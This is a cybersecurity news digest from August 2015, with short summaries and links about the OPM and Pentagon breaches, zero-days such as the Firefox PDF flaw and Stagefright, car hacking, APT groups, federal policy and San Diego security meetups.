CYBER NEWS TIDBITS FOR YOU - AUGUST 2015

Welcome to Cyber News Tidbits 4​U​ !

Here are updated news compilations from the Cyber Security Community

Topic headers (+++):

1 – Security news you can likely use (re: management / opportunity items)

2 – Other items of general FYI / FYSA level interest

3 – Threats / bad news stuff / etc.. 

and…

4 – SD/SoCAL items of interest / opportunities   (send me your SD meetings!) 


Another periodic cyber security news gram / digest / tidbits,

Arranged in a top down, “likely” interest level…with more short snippets, fewer threats and only a few local events (at the very bottom)

Feedback is always welcome tooas is sending me articles to sharecyber information sharing in action!

http://www.linkedin.com/in/mikedavissd

http://www.sciap.org/blog1/wp-content/uploads/CISO-Fundamentals.pdf

(all links  have been checked out… though you may need to cut & paste into your browser.

August 10

+ BLACK HAT Briefs …and… associated white papers (all PDFs)

Could not get there this year?  You can pick up some of the key points with these presentations, papers!!!

https://www.blackhat.com/us-15/briefings.html

AND… the black hat attendee survey….’time to rethink enterprise IT security???

https://www.blackhat.com/docs/us-15/2015-Black-Hat-Attendee-Survey.pdf

 

+  DEFCON 2015 briefs (enter at your own risk…;-))

If you intend to peak at code, I would recommend a Chromebook or opening in a separate partition on your HD… you KNOW the drill for these folks…;-))

https://media.defcon.org/DEF%20CON%2023/DEF%20CON%2023%20presentations/Speaker%20&%20Workshop%20Materials/

+  Report: Russia hacked Pentagon’s Joint Staff email

Russia is behind a spearphishing attack that forced the Pentagon to shut down its Joint Staff unclassified email system, NBC News is reporting. The hack, which took place around July 25, affected approximately 4,000 military and civilian personnel, NBC News reported. The news outlet cited U.S. officials who called the intrusion a “sophisticated cyberattack.” Pentagon officials have kept the system offline for almost two weeks. According to the NBC report, the cyberattack used a very fast-paced automated system that collected large amounts of data from the email accounts then distributed it to thousands of other accounts.

http://www.nextgov.com/cybersecurity/2015/08/reports-russia-hacked-pentagons-joint-staff-email/118939/?oref=ng-channeltopstory

+ Russia hacks Pentagon computers: They should be better protected than OPM???         

Really scary part.      “…Automated process to steal massive amounts of data and distribute to thousands of Internet points in a few minutes. ..”    So we all know the value of a balanced cyber posture, as many know it’s the first few hours (now minutes!) of an attack we must detect then thwart.. (even as we know the average data breach takes 200 days to get reported by a third party…:-((     Must speed up the front end of the cyber kill chain.. detect (I&W) with multiple methods… then defend!

http://www.cnbc.com/2015/08/06/russia-hacks-pentagon-computers-nbc-citing-sources.html

+ ‘New and different vulnerability’ exploited in Joint Staff email hack

A spear phishing attack into the unclassified email of the Pentagon’s Joint Staff “exposed a new and different vulnerability” than has been seen in the past, a senior Defense official told CNN on Wednesday. For more than 10 days, some 4,000 users on the Defense Department network have been without their email while military cyber experts have tried to scrub and rebuild the network. Spear phishing attacks are emails to employees that dupe them into giving up their network credentials. Military cyber experts have concluded the attackers were specifically targeting the Joint Staff, hoping to learn what they could from the unclassified email network.

http://edition.cnn.com/2015/08/05/politics/joint-staff-email-hack-vulnerability/index.html

 

+ 0-day attack on Firefox users stole password and key data: Patch now!

A website in Russia has been caught exploiting a serious zero-day vulnerability in Mozilla’s Firefox browser, prompting the open-source developer to deliver an emergency update that fixes the flaw. The bug in a built-in PDF reader allowed attackers to steal sensitive files stored on the hard drives of computers that used the vulnerable Firefox version. The attack was used against both Windows and Linux users, Mozilla researcher Daniel Veditz wrote in a blog post published Thursday. The exploit code targeting Linux users uploaded cryptographically protected system passwords, bash command histories, secure shell (SSH) configurations and keys. The attacker downloaded several other files, including histories for MySQL and PgSQL and configurations for remina, Filezilla, and Psi+, text files that contained the strings “pass” and “access” in the names. Any shell scripts were also grabbed.

http://arstechnica.com/security/2015/08/0-day-attack-on-firefox-users-stole-password-and-key-data-patch-now/

 

+U.S. decides to retaliate against China’s hacking

The Obama administration has determined that it must retaliate against China for the theft of the personal information of more than 20 million Americans from the databases of the Office of Personnel Management, but it is still struggling to decide what it can do without prompting an escalating cyberconflict. The decision came after the administration concluded that the hacking attack was so vast in scope and ambition that the usual practices for dealing with traditional espionage cases did not apply.

http://www.nytimes.com/2015/08/01/world/asia/us-decides-to-retaliate-against-chinas-hacking.html?_r=2

 

+ Researchers create first firmware worm that attacks Macs

The common wisdom when it comes to PCs and Apple computers is that the latter are much more secure. Particularly when it comes to firmware, people have assumed that Apple systems are locked down in ways that PCs aren’t. It turns out this isn’t true. Two researchers have found that several known vulnerabilities affecting the firmware of all the top PC makers can also hit the firmware of MACs. What’s more, the researchers have designed a proof-of-concept worm for the first time that would allow a firmware attack to spread automatically from MacBook to MacBook, without the need for them to be networked.

http://www.wired.com/2015/08/researchers-create-first-firmware-worm-attacks-macs/?mod=djemCIO_h

 

+ Sea-to-sea: China hacks in U.S.

National Security Agency map that shows nearly 700 cyber-assaults on computers at American military installations, government agencies, businesses and educational institutions raises the question among security experts whether the NSA should have shared some of that information. The NSA map, from 2014 and obtained by NBC News, purports to show the Chinese government’s massive cyber-assault on all sectors of the U.S economy, including major firms such as Google and Lockheed Martin, as well as the U.S. government and military. Red dots representing more than 600 corporate, private or government sites can be seen on the map, with many of the dots concentrated along the northeast corridor and Silicon Valley. The highest number of attacks were in California.

http://www.govinfosecurity.com/interviews/sea-to-sea-china-hacks-in-us-i-2825#

 

+ Federally funded project focuses on tracking data to prevent advanced persistent threats

The Defense Advanced Research Projects Agency and the Air Force Research Laboratory are seeking greater insight into how data are tracked between computers, Internet hosts and browsers with the intention of detecting and stopping advanced persistent threats. To that end, the Georgia Institute of Technology announced June 30 that it was awarded a $4.25 million contract from the two agencies in a four-year project called “THEIA” to discover exactly where data moves as it’s routed from one host to another and if, for example, malicious code is attached to that data.

http://www.fiercegovernmentit.com/story/federally-funded-project-focuses-tracking-data-prevent-advanced-persistent/2015-08-03

 

+ Survey exposes consumer fears about car hacking

Recent high-profile hacks have heightened awareness about the vulnerability of cars to electronic attacks, and there is real concern about vehicle cybersecurity, according to Kelley Blue Book’s new Vehicle Hacking Vulnerability Survey. The study’s results show that 71 percent of respondents are aware of the Jeep Cherokee hacking revealed last month by Wired, an incident that triggered the recall of over 1.4 million cars and trucks. The study also notes that more than three-quarters of respondents believe vehicle hacking will become a frequent problem within the next three years. The wide-ranging survey also investigated who consumers blame for these potential security issues, as well as how consumers would like these cyber-vulnerabilities handled.

http://www.cnet.com/news/survey-exposes-consumer-fears-about-car-hacking/#ftag=CAD590a51e

 

+ Apple and Google know what you want before you do

Apple Inc. and Google Inc. are racing to anticipate the needs of their users. The technology giants, whose software runs nearly all of the world’s smartphones, are adding features to deliver information before users ask for it. Their moves suggest that smartphones will evolve into devices that dispense information unprompted. The companies are tackling the technology differently, reflecting their own expertise and priorities. Apple’s Proactive Assistant, a feature of its forthcoming iOS 9 software, aims to learn how a user will behave from information stored on an iPhone. By contrast, Google Now combs data from a universe of online services and searches.

http://www.wsj.com/articles/apple-and-google-know-what-you-want-before-you-do-1438625660?mod=rss_Technology

 

+ Is hacking back a cyber-theft deterrent option?

A new report from the Hudson Institute on economic espionage in cyberspace reflects a shifting conversation in Washington from passive to proactive cyber defense – to the point of suggesting that an “Economic Warfare Command” be set up at the Treasury Department for using offensive coercion against adversaries. Cyber economic warfare is the pursuit of political and security goals through “cyber-enabled economic aggression,” and “in this type of warfare, the United States is particularly vulnerable,” said Samantha Ravich… (NOT unless you are the LAW!)

http://fcw.com/articles/2015/08/03/cyber-theft.aspx

 

+ VA launches cyber squad

LaVerne Council, the new CIO at the Department of Veterans Affairs, has assembled a team charged with coming up with an overall cybersecurity plan for the agency. The new Enterprise Cybersecurity Strategy Team will be led by Susan McHugh-Polley, a senior executive program manager at VA. The team includes executives and subject matter experts from across the VA’s Office of Information and Technology. “The team’s scope includes management of current cybersecurity efforts as well as development and review of VA’s cybersecurity requirements and operations holistically — from desktop to software to network protection,” a VA spokesperson told FCW.

http://fcw.com/articles/2015/08/04/va-cyber-squad.aspx

 

+ Dream of free and open Internet dying, lawyer says

The dream of a free and open Internet is slowly being killed by overregulation, censorship and bad laws that don’t stop the right people, a top computer crime defense lawyer says. The annual Black Hat computer security conference in Las Vegas kicked off Wednesday with a keynote address from Jennifer Granick, director of Civil Liberties at the Stanford Center for Internet and Society. Granick said that while the Internet needs to be reasonably safe in order to be functional, it’s no longer the revolutionary place it was 20 years ago.

http://www.nytimes.com/aponline/2015/08/05/us/ap-us-black-hat.html?_r=0

 

+ Flash zero-day weaponized in record time

The speed with which attackers are weaponizing zero-day vulnerabilities in the wild has been essentially cut in half. New research at Black Hat 2015 from Malwarebytes Labs shows that after Hacking Team, an Italian security company specializing in offensive technology, was compromised, their trove of zero days was leaked to the Internet, including several for Adobe’s Flash Player. The zero days were previously unknown, but were accompanied by clear and concise instructions to deploy them. As a consequence, exploit kit makers integrated it into their digital weapons in record time.

http://www.infosecurity-magazine.com/news/black-hat-2015-zeroday-weaponized/

 

FYI –  Comprehensive, overall Enterprise Mobile Security paper covers key enterprise concerns and mitigation recommendations – plus a specific phone set-up guide.  It’s an extensive overview of the mobile security space, threats, capabilities needed, etc… adding in a guide in the appendix for users and corporate.

It’s pretty useful as is, where we’re looking for folks to help finesse and more widely publish it – interested?

http://www.sciap.org/blog1/wp-content/uploads/Mobile-Security-paper-draft.pdf

 

+ This Man Implanted A Chip In His Arm To Hack His Way Into Buildings

Don’t get squeamish… there is a lot of stealthy reasons he did it, so will criminals too..

http://www.forbes.com/sites/thomasbrewster/2015/08/05/arm-implant-hacks-offices/

 

+ GE To Offer Industrial Data Analytics in the Cloud

Very nice way to get a PaaS solution to run all your IoT “big data / predictive / forensics ” efforts!!

https://adtmag.com/articles/2015/08/07/ge-predix-cloud.aspx?m=1

 

+ Russia, China And United States Engage In Cyber War

“Cyber WAR” is too fuzzy to have anyone other than the LAW, FBI, CIA etc do “it” –  great overviews though

http://www.valuewalk.com/2015/08/russia-vs-china-vs-us-cyber-war/

 

+ Study Reveals the Most Common Attack Methods of Data Thieves

http://www.darkreading.com/partner-perspectives/intel/study-reveals-the-most-common-attack-methods-of-data-thieves/a/d-id/1321544

 

+ Why every CIO needs a cybersecurity attorney (and cyber insurance!)

http://www.cio.com/article/2956374/legal/why-every-cio-needs-a-cybersecurity-attorney.html

 

2  +++++++

+ Organizations should focus on data sharing post-incident, not attribution

There have been several notable security incidents in the news this year, from healthcare and retail breaches, to financial; even security firms themselves have been targeted. In each instance, attribution seems to take the lead during incident response, something organizations should resist. The key is collecting the right information and passing it on to the right people. When it comes to figuring out who did it and where they are, authorities are the ones who should take the lead – organizations that focus on this area first are wasting resources and time.

http://www.csoonline.com/article/2956417/security-industry/organizations-should-focus-data-sharing-post-incident-not-attribution.html

 

+ Feds months away from broader cybersecurity ‘sprint’ strategy following OPM breaches

More than two weeks after the so-called “cybersecurity sprint” wrapped up, resulting in some improved protections across federal agencies, the government is working on an overarching strategy that’s still months away. In a July 31 blog post, Federal Chief Information Officer Tony Scott wrote that a team of more than 100 experts from across the government and private sector are reviewing federal cybersecurity policies, procedures and practices. “Ultimately, the team’s assessment will inform and operationalize a set of action plans and strategies to further address critical cybersecurity priorities and recommend a Cybersecurity Sprint Strategy and Implementation Plan to be released in the coming months,” he wrote.

http://www.fiercegovernmentit.com/story/feds-months-away-broader-cybersecurity-sprint-strategy-following-opm-breach/2015-08-03

 

+ Russian cyber underground goes from strength to strength

The Russian cybercrime underground has evolved to a new level of sophistication and professionalism, with enhanced features such as automation to accelerate sales, as well as translation and anti-spam proof services. That’s according to Trend Micro’s third report on the country, Russian Underground 2.0, which tracked and analyzed 78 forums – each with as many as 20,000 unique members. It claimed that traffic-related products and services – like traffic direction systems (TDSs) and pay-per-install (PPI) services – are “the cornerstone of the entire Russian malware industry” because they provide both an increased number of victims and useful C&C information for targeted attacks.

http://www.infosecurity-magazine.com/news/russian-cyber-underground-strength/

 

+ Shellshock flaw still actively exploited:

Shellshock, the Bash bug disclosed in September 2014, is still being exploited by threat actors, according to a report from Solutionary’s Security Engineering Research Team (SERT). While 10 months should have been enough time for organizations to ensure that they are protected against Shellshock attacks, researchers discovered that there are still numerous vulnerable systems and malicious actors are making the best of it. Data collected by Solutionary in the second quarter of 2015 shows that attackers have found new ways to exploit the Shellshock vulnerability, they have adapted their techniques in an effort to bypass intrusion prevention systems, and they have learned to rapidly extend successful compromises.

http://www.securityweek.com/shellshock-flaw-still-actively-exploited-solutionary

 

+ 7 cybersecurity questions to expect after the OPM breach

The OPM data breach has resulted in considerable “armchair quarterbacking” from government and industry, and already prompted the resignation of OPM Director Katherine Archuleta. While identifying parties, policies and practices responsible for cybersecurity breaches is an understandable part of the post-mortem process, it is more important to learn from recent events and encourage dialog that may result in sound choices in the future for information assurance in major computer systems. The depth and breadth of the OPM breach was a punch to the gut that should fuel a round of introspection and questioning, even for agencies with sophisticated cybersecurity programs in place. And to ensure your organization is not next in the limelight for all the wrong reasons, the answers to these questions must be the right ones.

http://gcn.com/Articles/2015/07/30/7-questions-cybersecurity.aspx?Page=1

 

+ White House preps new cyber policy dealing with federal contractors

The Obama Administration is preparing to release a new policy to homogenize the way vendors secure agency data. The proposal, which could be published as early as today, follows hacks at two background checkers an the Office of Personnel Management that potentially compromised the security of personnel who handle U.S. secrets. “The increase in threats facing federal information systems demand that certain issues regarding security of information on these systems is clearly, effectively, and consistently addressed in federal contracts,” states a notice scheduled to be posted Thursday in Federal Register.

http://www.nextgov.com/cybersecurity/2015/07/white-house-preps-new-cyber-policy-dealing-federal-contractors/118706/?oref=ng-HPriver

 

+ CYBERCOM wants secretive cyber arms dealer to hack Pentagon

The protection arm of the U.S. Cyber Command says it needs products from Endgame, a company known for crafting hacking tools, but purely to safeguard military networks. The once uber-secretive vendor is part of the cyber arms trade, a legal but controversial industry that sells governments so-called exploits, or “zero-days” in information security parlance. Endgame’s traditional goods are tailored to find and exploit bugs in software that developers have not discovered yet. Typically, the malware is deployed to help disrupt or tap an adversary’s systems. The tools for Cyber Command “cyber protection teams,” however, will not be used to attack adversary networks, but rather to find weaknesses in the dot-mil domain, according to the Air Force, which is managing the purchases.

http://www.nextgov.com/cybersecurity/2015/08/cybercom-wants-secretive-cyber-arms-dealer-hack-pentagon/118911/?oref=ng-channelriver

 

+ Can FITARA prevent future cyberattacks?

The Federal Information Technology Acquisition Reform Act – which aims to give agency chief information officers more authority over their IT budgets – could help CIOs eliminate outdated technology vulnerable to cyberattack, according to a group of federal IT leaders. “A lot of CIOs are getting called into the [deputy secretaries’] offices and they’re getting asked, ‘Is what happened to OPM going to happen to us?,” the Government Accountability Office’s Director of IT Management Issues David Powner said during a panel Tuesday in Washington on agile IT development.

http://www.nextgov.com/cio-briefing/2015/08/can-fitara-prevent-future-cyber-attacks/118856/?oref=ng-HPriver

 

+ Why banks are turning to tokenization to protect cloud data

Of all the sensitive data moving into the cloud, banking information may be the most precious, which is probably why financial institutions are increasingly looking at tokenization as a way to fend off cybercriminals, recent research suggested. California-based vendor CipherCloud released its “Q2 2015 Global Cloud Data Security Report,” which indicated that tokenization is used by 68 percent of the 50 banks surveyed, particularly for personally identifiable information (PII). It’s a technology that safeguards data by taking something like a bank card number and substituting a randomly generated figure of the same length for it. That way, even if cybercriminals compromise data in the cloud, it will be nearly impossible for them to use it.

https://securityintelligence.com/news/why-banks-are-turning-to-tokenization-to-protect-cloud-data/#.VcOgIPl0pQC

 

+ Internet firms to be subject to new cybersecurity rules in EU

Internet firms such as Cisco, Google and Amazon will be subject to a new EU cybersecurity law forcing them to adopt tough security measures and possibly report serious breaches to national authorities, according to a document seen by Reuters. The so-called Network and Information Security Directive has been stuck in talks between member states and EU lawmakers because of disagreements over whether to include digital platforms such as search engines, social networks, e-commerce sites and cloud computing providers. Members of the European Parliament want the law to only cover sectors they consider critical, such as energy, transport and finance.

http://www.reuters.com/article/2015/08/06/us-eu-cybersecurity-idUSKCN0QB1ZD20150806

 

+ Secure SDLC – building in software security

Resources to build your SW / apps store much more securely (BTW, working on a best practices / how to paper for this – anyone want to join us?)

https://buildsecurityin.us-cert.gov/articles/knowledge/sdlc-process/secure-software-development-life-cycle-processes

http://resources.infosecinstitute.com/intro-secure-software-development-life-cycle/

http://www.sans.org/reading-room/whitepapers/securecode/software-engineering-security-process-sdlc-1846

https://www.microsoft.com/en-us/SDL/process/design.aspx

AND the Software Assurance Maturity Model (SAMMhttp://www.opensamm.org/

 

+ Greenbelt-based MOOC platform offers free cybersecurity courses

http://technical.ly/dc/2015/01/16/cybrary-cybersecurity-moocs/

 

3  +++++++

+ HTML5 privacy hole left users open to tracking for three years

A feature of HTML5 that allows sites to detect battery life on a visitor’s device can also be used to track behavior, a piece of research has revealed. Analysts from France and Belgium made the discovery <http://eprint.iacr.org/2015/616.pdf>  while investigating the battery power API, used on Firefox, Chrome and Opera “Our study shows that websites can discover the capacity of users’ batteries by exploiting the high precision readouts provided by Firefox on Linux,” the authors write in a paper published online <http://eprint.iacr.org/2015/616.pdf> , having focused their efforts on Mozilla’s <http://www.wired.co.uk/mozilla>  browser. “The capacity of the battery, as well as its level, expose a fingerprintable surface that can be used to track web users in short time intervals.”

http://www.wired.co.uk/news/archive/2015-08/04/privacy-hole-in-firefox

 

+ Researcher says can hack GM’s OnStar app, open vehicle, start engine

A researcher is advising drivers not to use a mobile app for General Motors Co’s OnStar vehicle communications system, saying hackers can exploit a security flaw in the product to unlock cars and start engines remotely. “White-hat” hacker Samy Kamkar posted a video on Thursday saying he had figured out a way to “locate, unlock and remote-start” vehicles by intercepting communications between the OnStar RemoteLink mobile app and the OnStar service. Kamkar said he plans to provide technical details on the hack next week in Las Vegas at the Def Con conference, where tens of thousands of hacking aficionados will gather to learn about new cybersecurity vulnerabilities.

http://www.reuters.com/article/2015/07/30/us-gm-hacking-idUSKCN0Q42FI20150730

 

+ HAMMERTOSS malware represents culmination of ‘best practices’ for cyber attackers

In only a year, a Russian Advanced Persistent Threat (APT) group has proven to exemplify the future of cyber threats. It’s only a matter of time, FireEye researchers warned, until the group’s tactics make their way over to the cybercrime underworld. The group, known as APT29, uses a new malware called HAMMERTOSS to maintain a covert presence in victims’ systems, FireEye wrote in its report on the malware. Often times, the company’s staff told SCMagazine.com, the malware is used as a last effort, or “the big gun,” when other tools cease working.

http://www.scmagazine.com/apt29-group-tactics-profiled-by-fireeye/article/429298/

 

+ Black Vine espionage group attacked aerospace, energy, healthcare industries

Symantec has been monitoring the activities of the cyber espionage group that breached health insurance giant Anthem last year. Researchers say Anthem is just one of the threat actor’s many high profile targets. The personal details of 80 million individuals were compromised in the Anthem breach that came to light in February. Following the incident, researchers determined that the attackers were linked to Topsec, a Beijing-based IT security company with ties to the Chinese People’s Liberation Army (PLA). According to Symantec, the cyber espionage group behind the Anthem hack, which the company calls “Black Vine,” has been active since 2012. The group has relied on custom-built malware, zero-day exploits, and watering hole attacks to target organizations in the aerospace, healthcare, energy, military and defense, finance, agriculture, and technology industries.

http://www.securityweek.com/anthem-hackers-targeted-multiple-industries-2012-symantec

 

+++  SD/SoCAL security events / opportunities +++

+ CyberTECH events / networking / startups / etc  —  THE cyber happening place in SD!!! 

Join their Meetup Group for the latest event information!   The definition of “Cyber KEWEL

http://www.meetup.com/cybertech/

 

AUG

13 – ISC2 –  6PM –  Care Fusion – Cyber Security In Healthcare: Just What The Doctor Ordered?  David Scott.

Location – BAH (Suite 200)  4055 Hancock Street, San Diego, CA 92110 USA

20 – ISACA – noon –  Running InfoSec for America’s Finest City – Gary Hayslip – Coleman University

http://isaca-sd.org/event/august-2015-isaca-san-diego-chapter-meeting/

20 – OWASP –  6PM –  Joel Weinberger from Google  (at Qualcomm)

http://www.meetup.com/Open-Web-Application-Security-Project-San-Diego-OWASP-SD/

27  – ISSA – (4th Thus at 11.30)  – ‘Cybercrime: Operational Risk or Overblown Threat”    Stephen Cobb

(at ADM Baker field clubhouse)

http://www.sdissa.org/

 

—-  Global  Cyber events:

https://www.secureworldexpo.com/

https://heimdalsecurity.com/blog/44-relevant-cyber-security-conferences-around-the-world/

http://thecyberwire.com/events.htm

——————————————————————————–

August 2

+ Mobile security paper –key enterprise concerns and mitigations, plus set-up guide

We developed an extensive overview of the mobile security space, adding in a guide for users and corporate

It’s useful as is we think, where we’re looking for folks to help finesse and more widely publish it – interested?

http://www.sciap.org/blog1/wp-content/uploads/Mobile-Security-paper-draft.pdf

 

+ Chinese Information Dominance: Encircling America with Weaponized Technology

A very good view of our formidable adversary. .   (In addition to the Russian criminals..  ISIS… and other terrorists..)… PRC’s  key fronts..  already flanking us big time.. in case you needed more proof…:-((

http://sofrep.com/41114/china-encircling-america-weaponized-technology/

 

+ Car hacking: Security experts caution automakers on greater need for cybersecurity

New cars carry more interlinked computing systems than a typical small business. Buried under hoods and behind touchscreen control panels, microprocessors run by millions of lines of code operate an array of crucial functions, from brakes and steering to headlights and horns. Automakers are constantly adding more features, processors and software. This new era in the evolution of motorized transport seems like a win-win situation for all. Most consumers embrace the technologies, and automakers welcome the bigger profit margins that teched-out cars provide. But cybersecurity experts warn: Not so fast.

http://www.ibtimes.com/car-hacking-security-experts-caution-automakers-greater-need-cybersecurity-anti-2026472

 

+ Software vulnerabilities hit record high in 2014, report says

How safe is the software you use? Do you have a system in place to identify vulnerabilities and patch them when they are discovered? How quickly do you react to vulnerability reports? There’s evidence that software vulnerabilities are on the rise, and few companies are taking the necessary action to combat them. There was some worrying news in the recent Secunia Vulnerability Review 2015. The number of recorded vulnerabilities hit a record high of 15,435 last year, up 18% from 2013. The vulnerability count has increased 55% in the last five years. The report also found a rise in the number of zero-day vulnerabilities with 20 being uncovered in the 50 most popular programs. These are vulnerabilities that have already been exploited by hackers before being made public or being patched.

http://www.networkworld.com/article/2953304/security/software-vulnerabilities-on-the-rise-record-high-report.html

 

+ Here’s what your stolen identity goes for on the Internet’s black market

The going rate for a stolen identity is about twenty bucks. Tens of millions of people have lost their private information in data breaches over the past few years. But what happens after that-how the data are leveraged for financial gain-remains murky. Many of those stolen records end up for sale on the anonymous, seedy area of the internet commonly known as the dark web. Analyzing the sale of those records sheds some light on the vibrant market for stolen identities. On the dark web’s eBay-like marketplaces, the full set of someone’s personal information-identification number, address, birthdate, etc.-are known as “fullz.” We analyzed listings for individual fullz that were put up for sale over the past year, using data collected by Grams, a search engine for the dark web. Our question: How much is a stolen identity worth?

http://qz.com/460482/heres-what-your-stolen-identity-goes-for-on-the-internets-black-market/

 

+ DHS Secretary: I ‘probably’ should have stopped using Gmail sooner

Department of Homeland Security Secretary Jeh Johnson yesterday confirmed that he and 28 senior staffers have been using private web-based email on work computers for the last year.  Private email was banned from DHS computers in April 2014-after Office of Personnel Management (OPM) computers were breached. Now that he’s been caught by media for bending the rules, Johnson said that he plans to use his smartphone to access his personal Gmail account from now on. Speaking at a Politico event, Johnson said that he had obtained a waiver from DHS’ chief information officer to do continue accessing webmail from work.

http://www.infosecurity-magazine.com/news/dhs-secretary-probably-stopped/

 

+ Flash zero-day monster Angler dominates exploit kit crime market

SophosLabs researcher Fraser Howard says the Angler exploit kit is dominating the highly-competitive underground malware market, growing from exploding a quarter to 83 percent of market share within nine months. The blitzkrieg occurred between September and May this year. Angler emerged in 2013 to become one of the most capable exploit kits. Like its rivals, the code is designed to be an all-in-one ram-rod hacking package that web scum can use to get their malware, ransomware, and other net nasties past user machine defenses.

http://www.theregister.co.uk/2015/07/23/sophos_angler_ek/

 

+ IARPA funds program to predict next wave of cyberattacks

To-date, cybersecurity has largely been reactionary – stopping infiltrators before they can do too much damage to a system. A new initiative from the Intelligence Advanced Research Projects Agency is trying to get ahead of the next attack by combining traditional security techniques with information culled from unconventional sources to block currently unknown threats. The Cyberattack Automated Unconventional Sensor Environment (CAUSE) is a framework for coupling known threat indicators – whether internal or through shared information environments – with external information sources such as social media and search engine trends.

http://www.federaltimes.com/story/government/cybersecurity/2015/07/20/iarpa-cyberattack-unconventional-sensors/30415367/

 

+ Facebook just lost a search warrant fight, and that’s bad news for privacy

In a setback for privacy advocates, an appeals court on Tuesday ruled that law enforcement can order tech companies to hand over data on hundreds of users in one swoop – and the companies can’t challenge the warrant or even warn users about the search. The case in question involves an investigation by New York prosecutors into state employees who scammed the disability system. The investigation, which saw 134 people indicted, was partly based on scanning Facebook for posts that showed the employees doing sports or other physical activities.

http://fortune.com/2015/07/22/facebook-warrants/

 

+ Google Maps’ new ‘Your Timeline’ feature helps you track your travel history

Google is rolling out a new “Your Timeline” feature for Maps over the coming weeks that is certain to thrill some folks-and horrify others.  The feature allows you to view your entire location history on Google Maps based on data pulled from your devices when signed-in to your Google account. Google calls Your Timeline “a useful way to remember and view the places you’ve been on a given day, month or year.” You can already view your location history by diving into the My Account dashboard for your Google account. The difference now is that it will be available in a more user-friendly manner right from the Google Maps menu on the desktop or Android.

http://www.pcworld.com/article/2951099/web-applications/google-maps-new-your-timeline-feature-helps-you-track-your-travel-history.html

+ Neiman Marcus case a reminder to check your cyber coverage

It’s a decision that should send major corporations to double-check their cyberinsurance…   a federal appeals court ruled Monday that retail customers could go ahead and file a class-action lawsuit against Neiman Marcus in the wake of last year’s data breach. Previously, such cases were dismissed because the customers hadn’t suffered any actual damages.

http://www.csoonline.com/article/2954615/cyber-attacks-espionage/neiman-marcus-case-a-reminder-to-check-your-cyber-coverage.html#tk.rss_news

+  Will the Real Victim Stand Up?

Class action suits over data breaches continue to be met with conflicting results — but what effect does this have on corporations’ responsibility for consumer data protection?…

https://digitalguardian.com/blog/will-real-victim-stand

 

+ More Than a Third of Employees Willing to Sell Private Company Data and IP

Clearswift survey confirms that organizations must have data protection policies in place that safeguard against both malicious and inadvertent insider threats…

http://www.businesswire.com/news/home/20150729005410/en/Research-Reveals-Employees-Sell-Private-Company-Data#.Vb69c_nLfGm

 

+ Security awareness to benefit from government incentives,

says former GC of Verizon …Pricey government fines will force management to think security…

http://www.channelnomics.com/channelnomics-us/news/2419852/security-awareness-to-benefit-from-government-incentives-says-former-gc-of-verizon

 

+ State of Application Security Report At-A-Glance

The illegal reproduction and distribution of copyrighted material on the Web is extensive and growing rapidly…

https://www.arxan.com/resources/state-of-application-security/

https://www.arxan.com/wp-content/uploads/2015/06/State-of-Application-Security-Report-Vol-4-2015.pdf

 

+ Beware the Internet of Things — it’s early, security sucks and the C-Suite doesn’t care

The Internet of Things is one of those buzzphrases that sets all sorts of unrealistic expectations. There are other concerns though, many of which hinge around security…

http://diginomica.com/2015/07/28/beware-the-internet-of-things-its-very-early-and-security-sucks/#.Vb7BZvnLfGn

 

+ Cybersecurity Technology Integration Changes Everything

Based upon current and future cybersecurity technology integration trends, CISOs are adjusting budgets, organizations, skills, and vendor choices. Even industry analysts are impacted by cybersecurity technology integration…

http://www.networkworld.com/article/2953490/cisco-subnet/cybersecurity-technology-integration-changes-everything.html

 

+ Best Practices to Protect You, Your Network, and Your Information

During NCCIC’s recent work, following best practices proved extremely effective in protecting networks, the information residing on them, and the equities of information owners. Cybersecurity is a risk management issue. Our experience demonstrates that individuals and organizations may reduce risk when they implement cybersecurity best practices

https://www.us-cert.gov/ncas/current-activity/2015/07/31/Best-Practices-Protect-You-Your-Network-and-Your-Information

 

+ The First 24 Hours In The Wake Of A Data Breach

There is a direct correlation between how quickly an organization can identify and contain a data breach and the financial consequences that may result.

http://www.darkreading.com/attacks-breaches/the-first-24-hours-in-the-wake-of-a-data-breach/a/d-id/1321426

 

+ Wearable health technology and HIPAA: What is and isn’t covered

http://searchhealthit.techtarget.com/feature/Wearable-health-technology-and-HIPAA-What-is-and-isnt-covered

 

+ Cyber-boom or cyber-bubble?

Internet security has become a bigger export earner than arms…

http://www.economist.com/news/business/21660112-internet-security-has-become-bigger-export-earner-arms-cyber-boom-or-cyber-bubble#3A3O5Av8JAG4fDkj.99

 

+ Stagefright Android Bug: ‘Heartbleed for Mobile’ But Harder To Patch

Critical vulnerability in Android’s multimedia playback engine is easy to exploit, requires NO user interaction, and affects 95 percent of Android devices.  Just text their phone!!

http://www.darkreading.com/vulnerabilities—threats/stagefright-android-bug-heartbleed-for-mobile-but-harder-to-patch/d/d-id/1321477

 

+ Startup ‘Stealth Worker’ Matches Businesses With Security Talent

New online service helps businesses looking for part-time security professionals fill specific job needs…

http://www.darkreading.com/operations/startup-stealth-worker-matches-businesses-with-security-talent/d/d-id/1321550?

 

2  +++++++

+ Bill would mandate agencies use Einstein program

Could a change to federal law help prevent breaches such as those at the Office of Personnel Management that exposed the private information of more than 22 million individuals? Sen. Ron Johnson thinks so. Johnson, the South Dakota Republican who chairs the Senate Committee on Homeland Security and Governmental Affairs, and the panel’s ranking Democratic member, Tom Carper of Delaware, introduced on July 27 the Federal Cybersecurity Enhancement Act of 2015, which would require federal agencies to implement the government’s Einstein intrusion protection program.

http://www.govinfosecurity.com/bill-would-mandate-agencies-use-einstein-program-a-8436

 

+ What federal employees really need to worry about after the Chinese hack

A new government review of what the Chinese hack of sensitive security clearance files of 21 million people means for national security is in – and some of the implications are quite grave. Covert intelligence officers and their operations could be exposed and high-resolution fingerprints could be copied by criminals, the Congressional Research Service disclosed in an analysis of one of the most harmful cyber thefts in U.S. history. Since the breach was disclosed in June, the response to the compromised background investigation files and a separate intrusion into personnel data of 4.2 million people has focused mainly on the risk of identity theft.

http://www.washingtonpost.com/blogs/federal-eye/wp/2015/07/29/stolen-fingerprints-blown-spy-covers-the-risks-to-national-security-from-the-chinese-employee-hack/

 

+ How the way you type can shatter anonymity – even on Tor

Security researchers have refined a long-theoretical profiling technique into a highly practical attack that poses a threat to Tor users and anyone else who wants to shield their identity online. The technique collects user keystrokes as an individual enters usernames, passwords, and other data into a website. After a training session that typically takes less than 10 minutes, the website-or any other site connected to the website-can then determine with a high degree of certainty when the same individual is conducting subsequent online sessions. The profiling works by measuring the minute differences in the way each person presses keys on computer keyboards. Since the pauses between keystrokes and the precise length of time each key is pressed are unique for each person, the profiles act as a sort of digital fingerprint that can betray its owner’s identity.

